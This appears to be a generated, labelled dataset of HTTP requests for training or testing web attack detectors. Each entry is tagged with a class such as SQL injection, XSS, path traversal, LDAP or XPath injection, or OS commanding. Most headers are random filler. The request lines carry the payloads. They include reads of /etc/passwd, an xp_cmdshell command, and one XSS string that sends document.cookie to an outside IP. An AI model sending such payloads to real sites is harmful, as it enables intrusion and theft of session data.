Range: -004662,03-,-2001
Referer: /esyon/gcRdoi3r/roram/imehtss.php
TE: gzip
Trailer: User-Agent
User-Agent: eeSt2mk http://www.iT5ftso.fr
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: 3.6 84.243.131.206:04
Transfer-Encoding: compress
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 252435621932910
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37901
Start - Id: 36123
class: PathTransversal
GET /dA_zIU/s79id/th/E7aqhofetecmowro/2fIhttp77Eghtacces-Ygroup byps/nsWroxa8a.cgi?acp9dneelt=aXN2MMLhR5F&rttsRiEgi=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.0
Host: 193.60.92.159
Connection: keep-alive
Accept: video/*, image/jpeg;q=0.2, image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, identity;q=0.3
Accept-Language: tvtrw7i-e;q=0.8, kme-gS9E, ieia-dsy4ed;q=0.8
Cache-Control: no-transform
Client-ip: 15.197.219.248
Cookie: kto3OqTy.z_=eautoexectrw0delf2andhaopt;ZeH7OiD=eHhs
Cookie2: $Version="645"
Date: Mon, 06 Mar 06 07:57:24 UTC
ETag: "O@wdOljLOEMWn41hVasM"
Expect: 100-continue
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 18 Feb 09 10:04:32 GMT
If-Unmodified-Since: Fri, 05 Jun 09 11:01:55 CET
If-Match: "b5e7vsLGQtX1LeaFOqP"
If-None-Match: "0DaHq-f_qTdCAPg"
If-Range: "VKsM3rQokwRGUG5V"
Max-Forwards: 260
MIME-Version: 7.2
Pragma: t=c
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: -984
Referer: /Tias/efa7aei/trnv/oa3vna/6talt.php3
TE: chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.6 (X11; U; Linux i386 8.2; ih-Sh; rv:0.0.2) Gecko/82455351
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: HTTP/9.7 www.rEzn.gif
Transfer-Encoding: identity
Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 482 65.238.5.101 "ois0cbedlccylrNmtRrg" "Sun, 04 Jun 06 04:15:57 GMT"
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 15784658
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36123
Start - Id: 41196
class: SqlInjection
GET /dJjkPw0nBZ/MtVsQvRZQ_openna/elrpmnqL/eXHv40vzUc7JhK/5rt4ntrnwqsodeatrh/E0DmNVjmBCZGrm/Mhtacces.gif? HTTP/1.1
Host: 59.23.178.93:80
Connection: Ioaeauga
Accept: application/x-tar;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: N5ve-dgsrhlye;q=0.0, notseslc-ntt, r6lsiNso-ree;q=0.2
Cache-Control: ilotstu4=0aeepee
Client-ip: 75.232.65.99
Cookie: o0tS4=2532598512;SittdrbEme=uNe);0upasswd-oiframehavingu=b@keTaSnts;edeic=slkqnTnhpeoece;_Tmc=8;tOwoedsa=774003
Cookie2: $Version="63"
Date: Sat, 08 Nov 08 12:29:00 CET
ETag: W/"@QxDQYXYqE4.lW3RGCuj"
Expect: ewi8imt=Eenc
From: dH7gh@vEohnlmirz.net
If-Modified-Since: Mon, 23 Feb 04 02:50:53 CET
If-Unmodified-Since: Tue, 05 Jul 05 20:44:58 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Mar 07 06:40:30 GMT
Max-Forwards: 3819
MIME-Version: 9.8
Pragma: e='onya'
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: Basic aHNyczF1dEg6aWVzYQ==
Range: 0731-3915
Referer: http://www.atas2n7a.org/eckiP/e1qnod0/1thet/lRsS.wav
TE: trailers
Trailer: Referer
User-Agent: OR  'i2o7Wi'    BETWEEN  'R'   AND     'T'
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9560x6945
Via: 2.9 71.4.185.68:81, 0mshp/5.6 www.s6xet.htm:04450
Transfer-Encoding: cowmit; cInc=evo6et
Upgrade: palt/3.5, ine2/0.4
Warning: 985 www.enaw.tiff "drga" "Tue, 12 Feb 08 13:07:34 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41196
Start - Id: 42140
class: SqlInjection
GET /RoKS/eBGZDz/samu.gif?1nntlnA0sc6=naae&teEnlcod=iStnee7o&ufav9lGr=k-a+m&shutdownG@oYy.vB=35641329&aa1r7en=%27+++++or+++++id++++in++%28+++++select++++*++++from++++++user_db+++%29&n9L=irhahim&jdsdhio6cr=%5Dpasswd&e78smanta3hqt=ei7b&oxatffbu=rk5%40lCY6s.%403&HS=ewyRO&cewiimmibw1hot=ocai5daipoSEuumt HTTP/1.1
Host: www.Iexbsh.ch
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 114.28.0.8
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="5"
Date: Sat, 13 Dec 08 14:18:42 UTC
ETag: "Y-kpqEtfEwcQg2fs"
Expect: eljg7ttL=mlPtnLd
From: yaieolw@dAieet.st
If-Modified-Since: Tue, 06 Apr 10 20:31:51 GMT
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: "gXtmJ1o3QKiR1Y7fdl"
If-None-Match: *
If-Range: Sun, 22 Feb 04 16:54:51 UTC
Max-Forwards: 6262
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Ezaest 9Tliy=nalut
Range: 80-3804,023297-91,09-
Referer: /ix0in/RrcsgeO/eriasp.gif
TE: trailers
Trailer: Connection
User-Agent: Mozilla/3.5 (X11; U; Solaris 5.0; ts-me; rv:3.8.3) Gecko/96551977
UA-CPU: StrongARM
UA-Disp: 988,870,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: 2.9 220.34.83.69:822, 2.4 www.oeAns.png
Transfer-Encoding: deflate
Upgrade: dct/0.8, isti/6.6, rDb4l/1.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42140
Start - Id: 38440
class: LdapInjection
GET /ep75qwe1/--6/rS5tmkfUGgH0eZFcOP/zpianfneXtniqt/ae/R6l4hE2tfd3ninxh5fEt/hiiiaeiaiiN/ani.jpeg?aRes1nty87e=%2Bza&faeg6l=%3C43cjs%5Ceuo+meu%5C+qd&ewffW=1183315&lae=is8O6gI2mJ1n&iihHepd0iDu=bz%25&9eosioUnttar=%29++%28++%7C++++%28displayName%3Dhad*%29++++%28name+%3D+++had*%29%28mail%3Dhad*++++%29&miaweo=bhres8efQLtwra&l50se=479263&M3ftmpO=gt&hm=992&r4et=%3D+r+ HTTP/1.1
Host: www.yceeyfnurq.de
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-7, iso-8859-15
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 19.133.31.135
Cookie: c2id=2i1oa
Cookie2: $Version="1"
Date: Fri, 14 Sep 07 05:16:19 UTC
ETag: W/"BpcspexLKViXdbtMsF0W"
Expect: a8zE262
From: rrdhloR@le2p.gov
If-Modified-Since: Thu, 05 Feb 04 12:51:43 GMT
If-Unmodified-Since: Thu, 05 Feb 04 05:33:56 CET
If-Match: "lYDjuaJTlLKJXd0A47"
If-None-Match: *
If-Range: Thu, 10 May 07 12:25:04 UTC
Max-Forwards: 6
MIME-Version: 3.3
Pragma: irc4t6h=6tecn
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: NTLM dGdyemhlbWZ0bm84ZWV0dXNiMGFvcnU4aGhlZW5hdXRvb24=
Range: 722-
Referer: /edoah6.jpeg
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 4.5; au-hV; rv:1.6.8) Gecko/58742030
UA-CPU: 68000
UA-Disp: 664,920,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 040x944
Via: 7.8 16.254.235.238:89, 1.1 www.rooeTLr.css:678
Transfer-Encoding: compress
Upgrade: tunet/0.9, arant/2.6, wts/9.0, gdp/6.1
Warning: 002 214.157.156.89:632 "8yEitwPEhweiynae" "Mon, 24 Nov 08 09:49:08 CET"
X-Forwarded-For: 62.19.165.119
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38440
Start - Id: 47810
class: XSS
GET /lSrIA../alimob/epDOU9cso9tb0iNyQTP/iot/.ygABDQvbVM/4Kl.js?hrReNncjicgs=390657837&alas1desuphaIcO=dPhS&egopmo=313&etscoo=msz0aakHpm1&8ffoIhomeGY4xIh=%3Cxml++src+%3D%22++++javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F129.61.175.147%2Fge.sh%27%2Bdocument.cookie%29%3B%5D++%22+++%3E HTTP/1.0
Host: 70.184.28.110
Connection: deghYgo
Accept: video/*
Accept-Charset: shift_jis;q=0.1, windows-1258;q=0.4, euc-tw, windows-1251;q=0.9
Accept-Encoding: 
Accept-Language: pTdg-de
Cache-Control: no-store
Client-ip: 40.41.244.221
Cookie: reJ1nuepm=87388;MQ6RE1f=oig;05Z765.oFAhavingE=anETnpNscdH;XGY7Xv-httpunionF= htpass5c]ls-8tqeohr;ro1b8Wktmbqf=wo
Cookie2: $Version="5"
Date: Sun, 11 Jan 09 10:15:38 GMT
ETag: "cb8w5hhmsZL2xLnl0P0C"
Expect: WguInnoe
From: shnba@roottg.it
If-Modified-Since: Fri, 22 May 09 04:27:52 GMT
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: "blxckQPBRZolTKehi"
If-Range: Sat, 25 Feb 06 21:59:41 GMT
Max-Forwards: 99
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Digest opaque="e8ts9it"
Range: 2820-37,-5180,81-
Referer: /8alki/ntat/niec5/A1h6tu/qhene.pdf
TE: trailers
Trailer: Accept-Encoding
User-Agent: vyDcUZlBm http://www.tnclsEn0.it
UA-CPU: x86
UA-Disp: 8203,202,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 628x152
Via: HTTP/0.5 7.11.105.199, 3.3 247.22.173.87
Transfer-Encoding: gzip
Upgrade: sdmaat/7.9
Warning: 315 223.24.177.34 "gnbpnesajImnUauppEa" "Thu, 03 Jun 04 13:41:49 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 637705513942579260
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47810
Start - Id: 49359
class: XPathInjection
GET /diliUzd1/aYHZA.SeTiomWuBHfm/eerfdntoeilvhsa/olotaerobTi/eS0DjmGdnTXfCmHVnxP/IX0N5/owbQHU7dAevFadzGjVS/tCdhHcywhIIoi1/hakre.pl?oohtcue=766++or++f%2Fhuio%2Fle%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D818%5D++or++5%3D&eseenj=o2oi&hOCseas=06063303&5mprhtebmeesS=ohk7deadwoiMubueh&eL=sEJ&a6tgrmotcd9he=b7formOr&mihAawxy=c.3pY%40auunVu&ahlt=servicesadgctsgeidasn3h HTTP/1.1
Host: 182.35.2.78
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 186.93.100.231
Cookie: gDsomtaf=Yti;H8l9pl3nehe=~nhrnm+boaio;wrceosw=17185
Cookie2: $Version="189"
Date: Sun, 28 Mar 10 03:23:39 UTC
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: 100-continue
From: EgerC@tafwi.com
If-Modified-Since: Wed, 12 Aug 09 02:28:53 CET
If-Unmodified-Since: Tue, 22 May 07 22:37:34 GMT
If-Match: *
If-None-Match: "fVDI5P1-cC7e9XqZ0F_"
If-Range: "I@GKsH51G.ZI.bdCH"
Max-Forwards: 8401
MIME-Version: 2.9
Pragma: eeemst0e=gz
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: NTLM OHJBb3ZBaDd4OXlzYmNPc24zYnRpYXBlYWE0ZHJyYWxuZDJSbzJ0cXM3YQ==
Range: 896-
Referer: http://T7nnbshf.st/roezAyo.asp
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.6 (X11; U; Linux i386 5.2; re-d0; rv:3.6.7) Gecko/96752930
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 396x142
Via: FTP/5.5 www.uwoudy.htm:009, aa4/3.4 198.238.9.212:4, 8.7 11.229.65.94
Transfer-Encoding: gzip
Upgrade: eens/3.9, nsloG/2.4, fad/4.2, efvt/2.8
Warning: 652 www.nylcr.tiff "iphresmanuhdbtxo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49359
Start - Id: 49150
class: XPathInjection
GET /childrrQUM2/iJG.RWfGPEw64jFzc1R2/RhRhsaumhamlemyptph/hlTUFnmOceWUxhl/9WOEkl/sy4cD9@ftpls/trvbneHcns2efebsi/Jnph-LoSqH9tsamgH/toeoc6iIs/nFqEwJ108RJQ@sCx/sER7x/eomtb29zdsnmnR.asmx?aeedii=11135++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++++9206%3D HTTP/1.0
Host: www.ndemlhkylf.net:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: koi8-r;q=0.1
Accept-Encoding: *
Accept-Language: aw-c
Cache-Control: no-transform
Client-ip: 204.49.188.29
Cookie: ofendeo=4;Mkqof=audirXytk1ldresI0m
Cookie2: $Version="3"
Date: Sun, 07 Jun 09 22:57:39 GMT
ETag: "HjF@45Djy@lcchXqG"
Expect: cnapd=5nhiuzm;etnii
From: lrSasae@aaar.net
If-Modified-Since: Fri, 07 Jan 05 15:46:05 CET
If-Unmodified-Since: Thu, 12 Mar 09 05:51:19 UTC
If-Match: "2AnE0fOiLi1DTj2hTH2"
If-None-Match: *
If-Range: "OJIvPTeS_@EyuqIPocg"
Max-Forwards: 5614
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: rtra9 ieayrnr8=mdixsqo
Authorization: frfeqe ertt=nro9nn
Range: 4916-
Referer: /sjedyLp3/rn2e.rar
TE: trailers
Trailer: Pragma
User-Agent: tbogo49Tae (q3pow9Jq-; 0T@82zRm; 8onWZ4CZ)
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: 3.4 www.oime.shtml
Transfer-Encoding: 3sefwj; nao0=xpNroy
Upgrade: yfI/3.6
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49150
Start - Id: 47811
class: XSS
GET /seHaa0mu/eygfq@thEXV.EG6/CD3z1VH6RCWa/ftmpGsmwinntdocumentbK5xILZ/iekD_WaN8p6PDhI.tiff?ld=wssCom%40o&bWnm31V8ERyP=atEoemhnz&caJrr=88mzdUBte&rs0lsdrtav=nlH%29txme9httpgtelnetx%25di%3Dlsea&6MyAGi6tmpTpS=820653&NlounrxCrekic9=tblht%27l8lda%29st&rhoo6itro55r=3287&fmrih=%3Cimg+src%3D%26%7B%5Balert++++%28%27ftri4%27%29%3B%5D%7D%3B++++%3E&Letw3aooSiiri=lincethsge&Rstyle6OUTJVgRK1=tfilgexecbodye&IoeornoihnRib=m6io%24&4axtrureiAeess=0hot4&pvab=9191847335&ihuto9Dnijsaola=i6b7x8S44 HTTP/1.1
Host: www.tuzeS.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.4, deflate;q=0.2
Accept-Language: *;q=0.6
Cache-Control: min-fresh=8
Client-ip: 203.124.10.83
Cookie: reJ1nuepm=87388;MQ6RE1f=oig;05Z765.oFAhavingE=anETnpNscdH;XGY7Xv-httpunionF= htpass5c]ls-8tqeohr;ro1b8Wktmbqf=wo
Cookie2: $Version="5"
Date: Thu, 17 Feb 05 07:46:28 UTC
ETag: "cb8w5hhmsZL2xLnl0P0C"
Expect: WguInnoe
From: shnba@roottg.it
If-Modified-Since: Fri, 22 May 09 04:27:52 GMT
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: "mXTKK6G1B_WP-tlrg"
If-Range: Wed, 18 Apr 07 14:05:50 UTC
Max-Forwards: 017
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: NTLM M2ZzbmliZXJzZXkyZnduYWFzdHlpZURxaW9vYWFrMXM=
Range: 2820-37,-5180,81-
Referer: /iorsage/pispat.bin
TE: trailers,chunked,gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: Mozilla/0.7 (X11; U; SunOS sun4u 6.0; ec-fy; rv:9.9.4) Gecko/07522285
UA-CPU: x86
UA-Disp: 8203,202,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 628x152
Via: FTP/8.4 49.217.155.124
Transfer-Encoding: gzip
Upgrade: sejn/3.6
Warning: 315 223.24.177.34 "gnbpnesajImnUauppEa" "Thu, 03 Jun 04 13:41:49 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 637705513942579260
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47811
Start - Id: 36407
class: OsCommanding
GET /qh/rahlngsxs/o_D/yd4ycdcz6GFg90/oBxk/wfer8mkVJSqC8gW/bd8G6YrDJcCL6IuU/n8/e1erchitdceermnsAhj.html?holdgryel=exec+xp_cmdshell++++%27%22td2rsjf%22++++%3E%3E+++++script.vbs%27&oNmetawkt=49824999&txess2=qAt&BbEacsonyz=1806 HTTP/1.1
Host: www.irnfpet.be
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, x-mac-arabic;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=2207
Client-ip: 90.203.150.133
Cookie: em=oe8fo3bioednttie;Eiobliuta=iePtqi;usenrxr=45353475
Date: Sun, 27 Apr 08 20:37:56 UTC
ETag: "hOr.gXCisBKC7v6cJQ"
Expect: ehdmt
If-Modified-Since: Wed, 15 Nov 06 18:12:26 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 13 May 07 24:50:40 GMT
Max-Forwards: 726
Referer: /c93Gx/xtfh.mpeg
TE: trailers,deflate
User-Agent: t7rsasig/4.9.5.1.4
UA-CPU: PowerPC
Via: LYb4ae/0.7 73.2.170.101, HTTP/4.2 49.95.165.25
Transfer-Encoding: gzip
X-Serial-Number: 3132284615
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36407
Start - Id: 46238
class: PathTransversal
GET /sAdLoYDvxU6pM@qFi/tYLOCOiHM0T9b5koLC8/c3TPnodeNVF7m/kWo/aGJ7P/aReslavtnt/iti4tHttddm.htm?eoiaeq=55583&keatnp8fblg=eeKde%27all&esdb5e2qr=j4Ui1T-5&oDeKe4cs=h%244selectdeplinfsrtphp&eRgu9rcU=ruDgoefeiscae&rolh=hrdaEetta&enN=0796808719&bnoctui6sc1=81487149&laseBttnaked=w%3E&ijje4b7np=G%27oNbhrons&etAth=9e%2Fe&NceEwo6=%2Fetc%2Fpasswd HTTP/1.0
Host: www.wtkoHat.biz:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=36
Client-ip: 122.209.218.115
Cookie: IweLJP@JheFscript=en8lG2ii
Cookie2: $Version="8"
Date: Sun, 19 Sep 04 09:50:50 UTC
ETag: "uVWqFjF1f7c@HvfRr"
Expect: hoahd=l6nt2Ete;SDpta=EeAen5
From: eftra@neleobejy.com
If-Modified-Since: Wed, 28 Jan 09 13:21:48 UTC
If-Unmodified-Since: Fri, 11 Nov 05 23:47:50 GMT
If-Match: "sbc94y7.K7rZN.IEdv"
If-None-Match: *
If-Range: Thu, 17 Jul 08 08:11:53 CET
Max-Forwards: 751
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: oai3ur uAhsme=hhieet
Authorization: Basic bzZpbTdpZDpKa3VydGg1bQ==
Range: 173-
Referer: /umaten/ee3e.msf
TE: trailers
Trailer: Accept-Encoding
User-Agent: eaFQcOCu_S http://www.elefbtne.cz
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: 5.9 194.136.148.206, iis6mO/4.7 www.vInnB.png
Transfer-Encoding: gzip
Upgrade: Sdb/4.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46238
Start - Id: 46530
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: www.tymns7eome.be:3366
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: o8nrEwT-u2oee, rtgsm-iotmf;q=0.6, ao9aFs-1a;q=0.7, etkath-RXnuro;q=0.6, dstgstw-mtyoo;q=0.6
Cache-Control: only-if-cached
Client-ip: 246.28.222.74
Cookie: titEncrriH3=9wfxnshz;wqornR=jt9=efOinag;RsB9yr=uel d;datnroeuRtoy=al6/eyoimg>'i
Cookie2: $Version="23"
Date: Thu, 07 May 09 07:42:37 GMT
ETag: "aNVJT2lKpqFCO9DMA"
Expect: ta8rcs
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 27 Nov 05 11:09:58 CET
If-Unmodified-Since: Sat, 21 Feb 04 12:12:06 CET
If-Match: "9oYjg2GYAoSOmeeT-f"
If-None-Match: "--MkXcQZKkE5hke"
If-Range: *
Max-Forwards: 777
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 36325-
Referer: http://geesqa.cz/tipsd/h7hje/dlitnV/OuIvgp.fgf
TE: trailers
Trailer: If-None-Match
User-Agent: na.Zcmt http://www.hsaSoh.biz
UA-CPU: x86
UA-Disp: 9295,0090,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/4.1 www.qarnNl6.js, aenbe/8.3 www.sndbd.png
Transfer-Encoding: compress
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46530
Start - Id: 37884
class: LdapInjection
GET /mNh3jfL8HFxi/mrcalrdeeo1SdiEs/eHb2erlesDideiOordt/dkN3wN/-@aicKKy/mymdrjtnD.php?a4acivto4etbv=he4&erudat99bd=%29+++%28++%7C++++%28++cn%3D*o+++%27brien*+%29%28mail++%3D*o++%27brien*+%29&D3mtsOV=httpsmriandagr%7Ctc+%288J&bgsoundKD5neK@@_AW=r-sn1&ihriaiDbd=ar0Nltrm%7C HTTP/1.1
Host: 43.113.9.153
Connection: oEvaa
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: renOuryn-x7e, dh-l6syvyw, taHs0-eR
Cache-Control: no-store
Client-ip: 209.154.70.239
Cookie: 7Dr=nm;ejL1XZ=028;mr=1;yqoIc=tVuhl1Maz5i;eb2dfrds9Es=50
Cookie2: $Version="4"
Date: Thu, 15 Feb 07 23:02:10 CET
ETag: W/"f6rJoig5_jWofff_Gc"
Expect: ooauyOdi
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Sun, 19 Feb 06 18:38:45 GMT
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: *
If-None-Match: "4QttuDTIEQQlu6Uw"
If-Range: Sat, 13 Sep 08 06:11:14 CET
Max-Forwards: 0
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: an5hh ctrssarp=pm9b6n
Range: 41-534098,-55
Referer: http://www.xsnhx.ch/8s1lov/y0d8le/qnitv/iuPh.tiff
TE: gzip
Trailer: If-Modified-Since
User-Agent: lTeeat3bExintciy
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 1.8 www.esndtpon.htm, hot/6.0 137.81.47.31, 2.0 191.59.247.88:3250
Transfer-Encoding: gzip
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37884
Start - Id: 45232
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.1
Host: 155.199.153.146:6639
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: arR-y, sri5a-rn;q=0.1, lIyosd-hsQrs, ss-he, seno-ddxeu
Cache-Control: no-transform
Client-ip: 230.213.176.141
Cookie: .QI@WDb=9112
Cookie2: $Version="1"
Date: Sun, 18 Apr 04 23:19:07 GMT
ETag: W/"6vuxWoXtC_1td4rHOg@"
Expect: Ieam=7yoy
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Mon, 11 Apr 05 08:07:35 GMT
If-Unmodified-Since: Mon, 19 Jun 06 05:19:46 CET
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: "Y-OlY2tjtiH81a87aA"
Max-Forwards: 3442
MIME-Version: 3.6
Pragma: 1lczt55a=fndk
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM eUlsY0V0aHdZbndYRXVuVGc0c3RwODZub29TNE5uZW5ubnR0c3NjYWZjcnJ1TWQ=
Range: 220-5761,42620-
Referer: /OHnL.bin
TE: trailers,chunked;q=0.2,trailers
Trailer: Expect
User-Agent: stneeCdxe
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/3.9 www.ee60tcs.shtml
Transfer-Encoding: identity
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45232
Start - Id: 47667
class: XSS
GET /noSt5bavp/nTKY/oD0R9MmSLqfdkjsb0l/8tW97ltArbdySeeh/UstyleFO8fL/iEa/YnIrmYp7Or9gshutdownG/e3ttrmtesllh3/hmeYnrkN/libdeleteJfQs89binZ/5_MxO.NOy5kND73S.gif?iiote=acpMm&uSIj6Y=aeyiGw&bghaleFkT=4&KPshutdown0djZVdTydocument=%3Cimg++src%3D+%22++++javascript%3A%5Balert%28%27Ld%27%29%3B%5D%22+%3E&V7IY3EcBhttp=357263 HTTP/1.1
Host: www.a4riof.be:8
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-950, x-mac-cyrillic;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: ea6eab=h
Client-ip: 39.154.184.38
Cookie: obf=tlRwatt1ag;ziteA=1196;Ia=59565;xcrt9v=cy;eg9cc=35792
Cookie2: $Version="8"
Date: Mon, 13 Dec 04 02:07:27 CET
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 31 Aug 09 11:29:07 CET
If-Unmodified-Since: Wed, 28 Sep 05 17:46:56 CET
If-Match: "i4QRCYzzyN2UmI5luK8"
If-None-Match: *
